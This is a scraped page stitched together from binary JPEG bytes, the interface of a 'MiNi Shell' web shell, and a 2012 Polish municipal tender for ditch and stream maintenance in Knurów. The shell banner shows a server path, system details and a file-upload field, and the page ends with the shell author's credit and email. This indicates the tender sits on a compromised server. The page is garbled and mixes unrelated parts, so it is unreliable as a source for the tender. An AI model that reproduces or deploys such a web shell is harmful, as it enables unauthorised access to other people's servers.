JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120605/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120605/188342-N-2012.html

<p class="kh_header"><b>Knurów: Zabiegi konserwacyjne na istniejących ciekach powierzchniowych na terenie Gminy Knurów</b><br>
<b>Numer ogłoszenia: 188342 - 2012; data zamieszczenia: 05.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Knurów , ul. dr. Floriana Ogana 5, 44-190 Knurów, woj. śląskie, tel. 32 3392308, faks 32 2351521, 3392292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zabiegi konserwacyjne na istniejących ciekach powierzchniowych na terenie Gminy Knurów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie zamówienia publicznego pn. Zabiegi konserwacyjne na istniejących ciekach powierzchniowych na terenie Gminy Knurów.
2. Miejsce wykonywania prac:
2.1. Rów Pole Wschód - rów przebiegający wzdłuż drogi stanowiącej przedłużenie ul. Rybnej, 
rów otwarty o długości około	30mb;
2.2. Rów Foch III,
rów otwarty o długości około 770 mb,
odcinek zarurowany fi 1400 o długości około 350 mb;
2.3. Rów Witrel - rów przebiegający w sąsiedztwie ogrodów działkowych Witrel
rów otwarty o długości około 570 mb, 
odcinek zarurowany fi 600 (przejście pod nasypem kolejowym) 
o długości około 18 mb;
2.4. Rów pomiędzy ulicami Wyspiańskiego i Dębową, 
rów otwarty o długości około 200 mb;
2.5. Potok Knurówka - odcinek wlotowy do części zarurowanej przy ul. Wolności
odcinek rowu otwartego o długości około 70 mb; 
2.6. Potok Szczygłowicki w km 0+950-1+000,
odcinek rowu otwartego o długości około 50 mb;
2.7. Rów przy ul. Niepodległości - na wysokości warsztatu samochodowego, 
odcinek rowu otwartego o długości około 60 mb;
2.8. Prawostronny rów opaskowy (w rejonie mostu potoku Knurówka) przy ulicy Wilsona, 
odcinek rowu otwartego o długości około 200 mb;
2.9. Rów w rejonie ulic Wilsona i Niepodległości,
odcinek rowu otwartego o długości około 240 mb;
2.10. Rów w rejonie ulic Leśna i Zwycięstwa, 
odcinek rowu otwartego o długości około 400 mb;
2.11. Krata na wlocie do części zarurowanej rowu Foch w rejonie ul. Rakoniewskiego;
2.12. Krata na wlocie do części zarurowanej potoku Knurówka w rejonie ul. Wolności;
2.13. Krata na wlocie do kanalizacji deszczowej w rejonie skrzyżowania ul. Szpitalnej z drogą DK 78;
2.14. Krata na wlocie do odcinka zarurowanego (przejście pod nasypem) na rowie Witrel;
2.15. Inne odcinki cieków wskazane pisemnie przez Zamawiającego.
3. Zakres rzeczowy prac:
3.1. Rów Pole Wschód - rów przebiegający wzdłuż drogi stanowiącej przedłużenie ul. Rybnej:
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie porostów ze skarp i korony rowu około 200 m2,
c) usuniecie namułu z dna cieku,
d) usunięcie gruntu i namułu z powierzchni płyt ażurowych około 200 m2,
e) wywóz zanieczyszczeń stałych, namułów, wygrabionej roślinności.
3.2. Rów Foch III (rów otwarty i odcinek zarurowany fi 1400):
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie porostów ze skarp i korony rowu około 8200 m2,
c) usunięcie namułu z dna cieku,
d) odmulenie wlotu drenażu cmentarza i wylotu kolektora deszczowego fi 1200 w rejonie oczyszczalni ścieków,
e) usunięcie gruntu i namułu z powierzchni płyt ażurowych około 1700 m2,
f) niezbędna naprawa umocnień dna i skarp około 50m2,
g) przegląd kolektora fi 1400 na całej długości wraz z notatką opisującą stan techniczny kanału,
h) oczyszczenie przepustu syfonowego fi 800 pod rowem Foch długość około 20 mb,
i) wykoszenie i wygrabienie porostów ze skarp rowu opaskowego w rejonie wylotu rowu Foch do potoku Knurówka na długości około 45 mb,
j) usunięcie namułu z dna rowu opaskowego jw. na długości około 45 mb,
k) wywóz zanieczyszczeń stałych, namułów, wygrabionej roślinności.
3.3. Rów Witrel - rów przebiegający w sąsiedztwie ogrodów działkowych Witrel:
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie porostów, zakrzaczeń ze skarp i dna rowu oraz częściowo w pasie pomiędzy rowem a ogródkami działkowymi około 8000 m2,
c) usunięcie namułu z dna cieku,
d) oczyszczenie odcinka zarurowanego fi 600 (przejście pod nasypem) około 18 mb,
e) wywóz zanieczyszczeń stałych, namułów, wygrabionej roślinności.
3.4. Rów pomiędzy ulicami Wyspiańskiego i Dębową
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie porostów ze skarp i dna rowu około 790 m2,
c) usunięcie namułu z dna cieku,
d) udrożnienie przepustu pod ul. E. Plater,
e) wywóz zanieczyszczeń stałych, namułów, wygrabionej roślinności.
3.5. Potok Knurówka - odcinek wlotowy do części zarurowanej przy ul. Wolności:
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie porostów, zakrzaczeń ze skarp i dna rowu około 390 m2,
c) usunięcie namułu z dna cieku,
d) usunięcie gruntu i namułu z powierzchni płyt ażurowych około 110 m2,
e) niezbędna naprawa umocnień dna i skarp około 20m2,
f) wywóz zanieczyszczeń stałych, namułów, wygrabionej roślinności.
3.6. Potok Szczygłowicki w km 0+950-1+000
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie porostów, zakrzaczeń ze skarp i dna rowu około 310 m2,
c) usunięcie namułu z dna cieku,
d) wywóz zanieczyszczeń stałych, namułów, wygrabionej roślinności.
3.7. Rów przy ul. Niepodległości na wysokości warsztatu samochodowego
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie porostów ze skarp i dna rowu około 900 m2,
c) usunięcie namułu z dna cieku,
d) wywóz zanieczyszczeń stałych, namułów, wygrabionej roślinności.
3.8. Prawostronny rów opaskowy w rejonie mostu na potoku Knurówka, przy ulicy Wilsona
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie porostów, zakrzaczeń ze skarp i dna rowu około 1500 m2, 
c) usunięcie namułu z dna cieku, 
d) wywóz zanieczyszczeń stałych, namułów, wygrabionej roślinności.
3.9. Rów w rejonie ulic Wilsona i Niepodległości
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie porostów ze skarp i dna rowu około 1800 m2,
c) usunięcie warstwy namułu o grubości do 15 cm z dna cieku,
d) wywóz zanieczyszczeń stałych, namułów, wygrabionej roślinności.
3.10. Rów w rejonie ulic Leśna i Zwycięstwa:
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie porostów, zakrzaczeń ze skarp i dna rowu około 1000 m2,
c) usunięcie namułu z dna cieku, 
d) usunięcie gruntu i namułu z powierzchni płyt ażurowych około 140 m2,
e) oczyszczenie przepustu fi 600 pod ul. Leśną,
f) oczyszczenie przepustu fi 400 w sąsiedztwie działki nr 1414/94,
g) niezbędna naprawa umocnień dna i skarp około 50 m2,
h) wywóz zanieczyszczeń stałych, namułów, wygrabionej roślinności.
3.11. Przez cały okres trwania umowy wykonawca zobowiązany jest do utrzymania drożności niżej wymienionych krat poprzez usuwanie zanieczyszczeń, oblodzeń itp.:
a) wlot do części zarurowanej rowu Foch w rejonie ul. Rakoniewskiego,
b) wlot do części zarurowanej potoku Knurówka w rejonie ul. Wolności,
c) wlot do kanalizacji deszczowej w rejonie skrzyżowania ul. Szpitalnej z drogą DK 78,
d) wlot do odcinka zarurowanego (przejście pod nasypem) na rowie Witrel.
3.12. Prace wykonywane w miarę potrzeb w miejscach i terminie wskazanym pisemnie przez Zamawiającego:
a) usunięcie zanieczyszczeń stałych zalegających w korycie rowu,
b) wykoszenie i wygrabienie traw, porostów, zakrzaczeń ze skarp i dna rowu,
c) usunięcie namułu z dna rowu (bez względu na grubość namułu),
d) naprawa umocnień skarp i dna rowu (bez względu na wysokość skarp i szerokość rowu),
e) umocnienie dna rowu elementami prefabrykowanymi (bez względu na szerokość rowu),
f) umocnienie skarp płytami ażurowymi 40x60x10 betonowymi na podsypce piaskowej grubości 10 cm,
g) umocnienie skarp rowów przez obsianie trawą,
h) ukształtowanie dna rowu ze spadkiem w kierunku odbiornika wraz z niezbędnymi pomiarami geodezyjnymi (bez względu na szerokość rowu),
i) udrożnienie przepustu (bez względu na jego średnicę i wielkość zamulenia),
j) odbudowa przepustów rurowych, obejmującą rozbiórkę istniejących ścianek czołowych oraz odtworzenie nawierzchni (bez względu na średnicę przepustu),
k) wymiana rur w przepustach, obejmująca wydobycie uszkodzonej rury, założenie nowej rury, zabezpieczenie styków papą i betonem (bez względu na średnicę przepustu),
l) oczyszczenie studni rewizyjnej (bez względu na średnicę studni i wysokość zamulenia),
m) odbudowa studni rewizyjnej wraz z zamontowaniem nowej pokrywy żelbetowej lub betonowej (bez względu na średnicę studni),
n) przegląd techniczny zarurowanego odcinka rowu wraz z opisem (bez względu na średnicę).
4. Zamawiający zastrzega sobie prawo do ograniczenia zakresu rzeczowego prac na obiektach wymienionych w pkt 2 ppkt 2.1 - 2.10. Wartość prac wyłączonych z przedmiotu umowy ustalona zostanie w oparciu o zakres prac wyłączonych i stosowne pozycje kalkulacji cen ryczałtowych. W takim przypadku nastąpi zmniejszenie wynagrodzenia ryczałtowego na poszczególnych obiektach i ustalenie nowej wartości wynagrodzenia w aneksie do umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zastrzega sobie możliwość udzielenia zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 pzp realizatorowi zamówienia, zgodnych z przedmiotem zamówienia podstawowego i stanowiących nie więcej niż 20% jego wartości.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.64.10.00-2, 77.31.20.00-0, 45.22.12.44-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga wykazania w wykazie usług - doświadczenia w wykonaniu co najmniej 2 usług (zamówień) o wartości brutto minimum 90.000,00 zł każde lub jednej usługi (zamówienia) o wartości brutto nie mniejszej niż 180.000,00 zł, obejmujących wykonanie usług o charakterze porównywalnym z zakresem niniejszego zamówienia, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 
Za usługi porównywalne z zakresem niniejszego zamówienia uznaje się wykonanie prac polegających na prowadzeniu w okresie roku (tzn. 365 dni) zabiegów konserwacyjnych na ciekach powierzchniowych, których łączna długość wynosi co najmniej 2000 metrów bieżących. 
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami (wiedzą i doświadczeniem) niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (wiedzy i doświadczenia) na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga wskazania w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia osoby nadzorującej realizację prac objętych zamówieniem, posiadającej uprawnienia melioracyjne lub budowlane w specjalności instalacyjnej w zakresie sieci i urządzeń kanalizacyjnych, bądź w specjalności konstrukcyjno - budowlanej.
Zamawiający zwraca uwagę, iż zgodnie z wymaganiami art. 12 ust. 7 ustawy - Prawo budowlane podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie (kierownika budowy lub kierownika robót) stanowi m. in. wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, a członkowie izby samorządu zawodowego podlegają obowiązkowemu ubezpieczeniu OC.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował osobami zdolnymi do wykonania zamówienia niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga wykazania się posiadaniem opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 100.000,00 zł.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 3 miesiące przed upływem terminu  składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę istotnych postanowień umowy zawartej w wyniku niniejszego postępowania w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadkach wskazanych w projekcie umowy stanowiącym załącznik do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.knurow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy w siedzibie zamawiającego - Wydział Zamówień Publicznych, pok. 217, w godz. pracy Urzędu lub za zaliczeniem pocztowym po uiszczeniu opłaty na konto zamawiającego. Opłata 11 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2012 godzina 10:00, miejsce: Urząd Miasta Knurów, ul. dr. F. Ogana 5, 44-190 Knurów, Wydział Zamówień Publicznych, pok. 217.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z wykonawcami są: 
1. Naczelnik Wydziału Zamówień Publicznych - Grażyna Szweda, tel. 32 339-23-08, 
2. Inspektor Wydziału Zamówień Publicznych - Urszula Czarnecka, tel. 32 339-23-09.
Fax 32 339-22-92, e-mail zp@knurow.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com